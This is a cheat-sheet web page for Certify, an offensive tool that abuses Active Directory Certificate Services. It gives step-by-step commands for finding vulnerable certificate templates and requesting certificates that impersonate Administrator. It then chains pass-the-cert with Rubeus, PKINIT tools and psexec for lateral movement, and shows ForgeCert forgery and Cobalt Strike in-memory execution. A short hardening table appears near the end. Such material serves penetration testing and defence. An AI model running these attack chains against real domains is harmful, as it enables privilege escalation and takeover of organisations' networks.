Pular para o conteúdo
1337skills 1337skills - Folhas de Dicas

Certify

Certify is a .NET tool for enumerating and abusing Active Directory Certificate Services (AD CS) to identify vulnerable certificate templates and misconfigured certification authorities for privilege escalation and lateral movement.

Installation

Compile from Source

Clone the GhostPack repository and compile with Visual Studio:

git clone https://github.com/GhostPack/Certify.git
cd Certify
# Open Certify.sln in Visual Studio 2019/2022
# Build > Build Solution (Release x64)
# Output: Certify.exe in bin/Release/

Precompiled Releases

Download precompiled binaries from the GitHub releases page:

# Extract and execute directly
.\Certify.exe find /vulnerable

Execute-Assembly in Cobalt Strike

Load Certify as a .NET assembly in Cobalt Strike for in-memory execution:

beacon> execute-assembly /path/to/Certify.exe find /vulnerable

Quick Start

Find Vulnerable Templates

# Enumerate all templates and identify those with known vulnerabilities (ESC1-ESC8)
Certify.exe find /vulnerable

Enumerate All CAs

# List all certification authorities in the domain
Certify.exe cas

Enumerate All Templates

# Display all certificate templates available for enrollment
Certify.exe find

Enumeration

Enumerate Certification Authorities

# List all CAs with detailed information
Certify.exe cas

# Output includes:
# - CA Name
# - DN (Distinguished Name)
# - Certificate Subject
# - Web Enrollment support

Enumerate Certificate Templates

# List all available templates with enrollment requirements
Certify.exe find

# Displays:
# - Template Name
# - EKU (Extended Key Usage)
# - Enrollment Rights
# - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag
# - Manager Approval requirement
# - Authorized Signatures

Find Vulnerable Templates

# Identify templates vulnerable to ESC1-ESC8 attacks
Certify.exe find /vulnerable

# Highlights potentially exploitable misconfigurations

Filter by Template Purpose

# Find templates allowing client authentication (ESC1/ESC3)
Certify.exe find /clientauth

# Find templates where enrollee supplies subject (ESC1)
Certify.exe find /enrolleeSuppliesSubject

Enumerate PKI Objects and Permissions

# Display detailed PKI object information including permissions
Certify.exe pkiobjects

# Shows CA access control lists and enrollment agent permissions

Certificate Request

Basic Certificate Request

# Request certificate from specific CA using target template
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User

Subject Alternative Name (SAN) Abuse

# Add alternate principal name (ESC1 exploitation)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /altname:Administrator

# Common targets for SAN abuse:
# /altname:Administrator         # Domain admin user
# /altname:DOMAIN\Administrator  # Fully qualified name
# /altname:krbtgt                # KDC account

On-Behalf-Of Enrollment

# Request certificate on behalf of another user (enrollment agent abuse)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /onbehalfof:DOMAIN\Administrator

Install Certificate After Request

# Install generated certificate in current user's personal store
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install

# Certificate stored in:
# Cert:\CurrentUser\My\[Thumbprint]

Export Certificate to File

# Request and output certificate/key to PFX (contains private key)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install

# Retrieve from certificate store and export with openssl
# (See Integration section)

Vulnerable Template Identification

ESC1: Unrestricted Enrollment + SAN Abuse

Conditions:

  • Template allows any principal to enroll
  • Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set)
  • EKU includes client authentication
  • Manager approval not required

Certify identifies: [!] Enrollee supplies subject

Exploitation: Request cert with /altname:Administrator and use for authentication.

ESC2: Certificate Template Abuse (General Abuse)

Conditions:

  • Any EKU allows any purpose
  • Enrollee supplies subject enabled
  • No manager approval

Certify identifies: [!] ANY_PURPOSE EKU

Exploitation: Request cert for arbitrary use cases (authentication, signing, encryption).

ESC3: Enrollment Agent Abuse

Conditions:

  • Enrollment Agent template allows unrestricted enrollment
  • Any principal can request as another user
  • Target user’s template allows enrollment

Certify identifies: [!] Enrollment Agent template + enrollment rights mismatch

Exploitation: Use /onbehalfof to request certs for high-privilege users.

ESC4: Misconfigured Certificate Template Permissions

Conditions:

  • Low-privileged user has ModifyTemplate rights
  • Can modify template settings to create vulnerability
  • Change EKU, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, permissions

Certify identifies: Template permissions via pkiobjects

Exploitation: Modify template then request exploitable certificate.

ESC5: Vulnerable PKI Object Permissions

Conditions:

  • Low-privileged user has dangerous permissions over CA/templates
  • FullControl, Write, WriteDacl on PKI objects
  • Can modify CA configuration or template settings

Certify identifies: via pkiobjects + low-priv user with ACE

Exploitation: Modify template CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or CA settings.

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag

Conditions:

  • CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
  • Allows client-supplied SubjectAltName in requests
  • Default template allows any user to request

Certify identifies: [!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled

Exploitation: Request cert with arbitrary SAN on any template.

ESC7: Vulnerable CA Access Control

Conditions:

  • Low-privileged user has dangerous permissions (Manage Certificates, etc.)
  • Can approve/deny pending requests
  • Can configure CA settings

Certify identifies: via pkiobjects + ACL review

Exploitation: Approve own requests, modify CA configuration.

ESC8: Web Enrollment Enabled

Conditions:

  • CA has web enrollment service enabled
  • Accessible without authentication or with weak auth
  • No request validation

Certify identifies: [+] Web Enrollment Enabled

Exploitation: Submit request directly via HTTP without strong auth.

CA Enumeration Details

CA Permissions and Access Control

# Review CA access control lists
Certify.exe pkiobjects

# Look for:
# - Low-privileged users with "Manage Certificates"
# - Non-admin users with CA access
# - Enrollment agent permissions

EDITF Flags

# CA with EDITF_ATTRIBUTESUBJECTALTNAME2 allows client-supplied SANs
# This creates ESC6 vulnerability if any template allows unrestricted enrollment

Certify.exe cas
# Look for "[!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled"

Web Enrollment Endpoints

# Check for enabled web enrollment service
Certify.exe cas

# Web enrollment typically hosted at:
# http://CA-SERVER/certsrv/
# https://CA-SERVER/certsrv/

# Request certificate via HTTP POST if authentication is weak/missing

Template Analysis

Understanding Certify Output

[+] Template Name: User
    [+] Template Schema Version: 2
    [+] Display Name: User
    [+] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com
    [+] Enrollment Rights:
        Authenticated Users - Full (2032)
    [+] EKU: Client Authentication, Email Protection
    [+] Enrollee Supplies Subject: True
    [+] Manager Approval: False
    [+] Requires Authorized Signatures: 0
    [+] Authorized Signatures: 
    [+] CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: True

Key Fields

FieldMeaning
Enrollee Supplies SubjectUser can specify certificate subject/SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECTCertificate template flag enabling above
EKUExtended Key Usage (Client Auth, Server Auth, Code Signing, etc.)
Enrollment RightsWhich principals can request from this template
Manager ApprovalRequires CA manager to approve request
Authorized SignaturesNumber of authorized signatures required
ANY_PURPOSEDangerous EKU allowing any usage

Dangerous Configurations

[!] Enrollee supplies subject
[!] Any principal can enroll
[!] Client Authentication EKU present
[!] Manager Approval: False
[!] Authorized Signatures: 0

# All together = ESC1 vulnerability

Certificate Installation and Usage

Export Certificate to PFX

# From certificate store to file
$cert = Get-ChildItem Cert:\CurrentUser\My\[Thumbprint]
$password = ConvertTo-SecureString -String "password" -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath cert.pfx -Password $password

Convert PFX to Rubeus Format

# Install openssl or use WSL
openssl pkcs12 -in cert.pfx -out cert.pem -nodes -passin pass:password

# Load into Rubeus for Kerberos authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pem /createnetonly:C:\Windows\System32\cmd.exe

Pass-the-Cert Attack

# Use certificate for authentication without plaintext password
# Via Rubeus PKINIT
Rubeus.exe asktgt /user:Administrator /certificate:C:\path\to\cert.pfx /password:certpassword /createnetonly:C:\Windows\System32\cmd.exe

# Spawns process with TGT for Administrator
# Use for lateral movement and persistence

PKINIT and Kerberos

# PKINITtools - Kerberos authentication via certificate
# Requires certificate with Client Authentication EKU

# Request TGT using certificate identity
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password domain.com\\Administrator administrator.ccache

# Use ccache for lateral movement
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET

Troubleshooting

”Access Denied” During Enumeration

# Running as non-domain-joined user or unauthenticated
# Ensure domain connectivity and valid credentials

# Run as domain user:
runas /user:DOMAIN\username cmd.exe
# Then execute Certify.exe

No Vulnerable Templates Found

# May indicate:
# 1. Templates properly secured (no ESC conditions)
# 2. Organization hardened against ADCS attacks
# 3. Limited template visibility for current user

# Review all templates regardless:
Certify.exe find
# Manually analyze based on ESC conditions above

Certificate Request Denied

# Reasons:
# - Insufficient enrollment rights
# - Template requires manager approval (pending request)
# - CA configured to deny certain principals

# Check enrollment rights:
Certify.exe find /template:TemplateName
# Review "Enrollment Rights" output

Web Enrollment 404 or Unavailable

# CA web enrollment service not running or disabled
# Fallback to direct CA RPC interface

# Certify uses RPC by default, web enrollment is optional
# Check CA configuration for enabled services

Best Practices

PracticeDescription
Review All TemplatesRun Certify.exe find and manually review against ESC conditions
Monitor EnrollmentsTrack certificate requests on CAs for suspicious activity
Restrict SAN AbuseDisable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on sensitive templates
Enforce ApprovalsRequire manager approval for privileged templates
Limit Enrollment RightsRestrict principals able to enroll (not Authenticated Users)
Disable EDITF FlagsReview and remove unnecessary EDITF_* flags on CAs
RBAC on PKI ObjectsLimit template modification and CA access to admins
Certificate AuditingMonitor issued certificates for anomalies
EKU RestrictionsUse specific EKUs (not ANY_PURPOSE)

Certipy (Python)

# Python ADCS enumeration and exploitation
certipy find -u user@domain.com -p password -dc-ip 10.0.0.1
certipy req -u user@domain.com -p password -ca CA-NAME -template User

ForgeCert

# Forge certificates without CA interaction
# Requires NTLM hash of CA account
ForgeCert.exe --CaCert ca-cert.cer --CaKey ca-key.key --Subject CN=Administrator

Rubeus

# Kerberos manipulation and PKINIT authentication
# Integrated with certificate-based authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx

PKINITtools

# Kerberos PKINIT support and certificate-based auth
# Cross-platform (Python/Linux)
getTGT.py -cert-pfx cert.pfx DOMAIN/Administrator

Certutil (Native Windows)

# Native Windows utility for certificate operations
certutil -config CA-NAME -ca.cert ca-cert.cer

# Request certificate directly
certutil -ca.cert -crl